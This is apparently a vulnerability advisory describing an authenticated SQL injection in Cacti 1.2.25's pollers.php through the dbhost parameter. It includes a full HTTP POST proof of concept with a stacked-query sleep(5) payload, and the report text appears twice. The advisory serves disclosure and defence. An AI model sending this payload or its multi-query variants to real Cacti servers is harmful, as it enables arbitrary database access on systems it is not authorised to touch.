SQL Injection
Product: Cacti
Version: 1.2.25
Description: It is possible to execute arbitrary SQL code through the pollers.php script. Exploitation of the vulnerability is possible for an authorized user. The vulnerable component is the pollers.php. Impact of the vulnerability - arbitrary SQL code execution.
Mitigation: Improve user data escaping to prevent SQL injection.
Research
SQL Injection was executed in the pollers.php file.
The pollers.php file has an action – form_save, which is called if the user receives an action parameter with the value save.
Figure 1. In the script pollers.php the form_save function is called
In the form_save function (line 321) the poller_host_duplicate function is called, and the second parameter passes the value without sanitization get_nfilter_request_var('dbhost').
Figure 2. Getting the dbhost parameter and using it as the second parameter in the poller_host_duplicate function
There is a SQL Injection vulnerability in the function poller_host_duplicate on the line 427.
Figure 3. SQL Injection using the $host variable, which is controlled by the attacker in the poller_host_duplicate function
Researcher creates an HTTP request containing SQL Injection, which will put the database server to sleep for 5 seconds.
Listing 1. HTTP request demonstrating SQL Injection
POST /cacti/pollers.php?header=false HTTP/1.1
Host: ***.***.*.174:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101
Firefox/119.0
Accept: */*
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 274
Origin: http://***.***.*.174:8080
Connection: close
Referer: http://***.***.*.174:8080/cacti/pollers.php?action=edit&id=1
Cookie: CactiDateTime=Sat Oct 28 2023 22:47:22 GMT+0300 (�о�ква,
��анда��ное в�ем�); CactiTimeZone=180;
Cacti=acbmsv2adk9forvpkqt0njd1oc;
cacti_remembers=1%2C0%2C28a320bc68fa35780e2f050b1f2eb14c0f0adc1d11112f87cf2360dd1
bbdc939; CactiDateTime=Fri Oct 27 2023 12:27:36 GMT+0300 (�о�ква,
��анда��ное в�ем�); CactiTimeZone=180
__csrf_magic=sid%3Aa75547fddea89cbf28c4b77050af90283d0b7554%2C1698522443&name=Mai
n+Poller&hostname=unknown&timezone=¬es=&processes=1&threads=1&id=2&save_compon
ent_poller=1&dbhost=";%20select%20sleep(5);%20select%20*%20from%20poller%20where%
201=1%20and%20"%"="&action=save
Note that this SQL Injection successfully supports multiqueries. This means that during one access to the database you can execute several arbitrary SQL queries unrelated to each other.
Figure 4. HTTP request and HTTP response that returned from the server after more than 5 seconds
Researcher: Aleksey Solovev (Positive Technologies)
TheWitness Analyst
netniV Analyst
SQL Injection
Product: Cacti
Version: 1.2.25
Description: It is possible to execute arbitrary SQL code through the
pollers.phpscript. Exploitation of the vulnerability is possible for an authorized user. The vulnerable component is thepollers.php. Impact of the vulnerability - arbitrary SQL code execution.Mitigation: Improve user data escaping to prevent SQL injection.
Research
SQL Injection was executed in the
pollers.phpfile.The
pollers.phpfile has an action –form_save, which is called if the user receives an action parameter with the valuesave.Figure 1. In the script
pollers.phpthe form_save function is calledIn the
form_savefunction (line 321) thepoller_host_duplicatefunction is called, and the second parameter passes the value without sanitizationget_nfilter_request_var('dbhost').Figure 2. Getting the dbhost parameter and using it as the second parameter in the
poller_host_duplicatefunctionThere is a SQL Injection vulnerability in the function
poller_host_duplicateon the line 427.Figure 3. SQL Injection using the
$hostvariable, which is controlled by the attacker in thepoller_host_duplicate functionResearcher creates an HTTP request containing SQL Injection, which will put the database server to sleep for 5 seconds.
Listing 1. HTTP request demonstrating SQL Injection
Note that this SQL Injection successfully supports multiqueries. This means that during one access to the database you can execute several arbitrary SQL queries unrelated to each other.
Figure 4. HTTP request and HTTP response that returned from the server after more than 5 seconds
Researcher: Aleksey Solovev (Positive Technologies)